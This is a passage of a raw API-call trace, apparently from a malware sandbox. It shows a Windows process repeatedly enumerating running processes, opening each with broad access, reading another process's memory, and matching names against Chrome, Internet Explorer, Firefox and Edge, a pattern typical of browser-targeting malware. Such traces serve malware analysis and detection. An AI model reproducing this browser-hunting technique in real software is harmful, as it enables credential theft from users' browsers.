	[0206.212] NtQueryInformationProcess (in: ProcessHandle=0x2ec4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0206.212] ReadProcessMemory (in: hProcess=0x2ec4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0206.212] ReadProcessMemory (in: hProcess=0x2ec4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0206.212] ReadProcessMemory (in: hProcess=0x2ec4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0206.212] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0206.213] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0206.213] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x2ec8
	[0206.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.214] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0206.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.214] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.214] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0206.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.214] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.215] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0206.215] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x2ecc
	[0206.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.215] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0206.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.216] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.216] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0206.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.216] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.217] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.218] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x2ed0
	[0206.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.218] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.218] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.219] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.219] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.219] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.220] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.220] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x2ed4
	[0206.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.221] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.221] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.221] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.222] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.222] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0206.222] CloseHandle (hObject=0x188) returned 1
	[0206.222] Sleep (dwMilliseconds=0x64) 
	[0206.326] GetCurrentProcessId () returned 0x110
	[0206.326] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0206.329] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0206.330] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0206.330] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0206.331] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x2ed8
	[0206.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.332] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0206.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.332] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.332] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0206.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.333] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.333] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0206.334] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x2edc
	[0206.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.335] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0206.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.335] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.336] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0206.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.336] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.336] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0206.337] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x2ee0
	[0206.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.338] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0206.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.338] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.339] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0206.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.339] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.340] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0206.341] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x2ee4
	[0206.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.341] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0206.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.342] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.342] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0206.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.343] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.343] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0206.343] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x2ee8
	[0206.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.344] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0206.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.344] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.344] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0206.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.344] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.345] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0206.345] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x2eec
	[0206.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.346] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0206.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.346] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.346] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0206.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.347] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.347] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0206.347] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x2ef0
	[0206.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.348] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0206.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.348] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.348] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0206.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.348] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.349] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0206.349] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x2ef4
	[0206.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.349] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0206.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.350] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.350] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0206.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.350] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.350] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.351] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x2ef8
	[0206.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.351] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.351] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.352] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.352] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.352] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.353] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x2efc
	[0206.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.353] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.353] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.354] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.354] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.354] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.355] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x2f00
	[0206.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.355] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.355] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.356] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.356] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.356] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.357] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x2f04
	[0206.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.357] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.358] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.358] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.358] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.358] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.359] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x2f08
	[0206.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.359] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.360] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.360] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.360] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.361] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.361] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x2f0c
	[0206.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.361] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.362] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.362] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.362] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.363] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.363] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x2f10
	[0206.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.363] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.364] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.364] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.364] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.365] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0206.365] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x2f14
	[0206.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.366] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0206.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.366] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.366] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0206.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.367] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.367] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.368] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x2f18
	[0206.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.368] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.368] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.368] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.369] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.369] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0206.370] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x2f1c
	[0206.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.370] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.370] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.370] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.371] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.371] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0206.372] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x2f20
	[0206.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.372] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0206.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.372] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
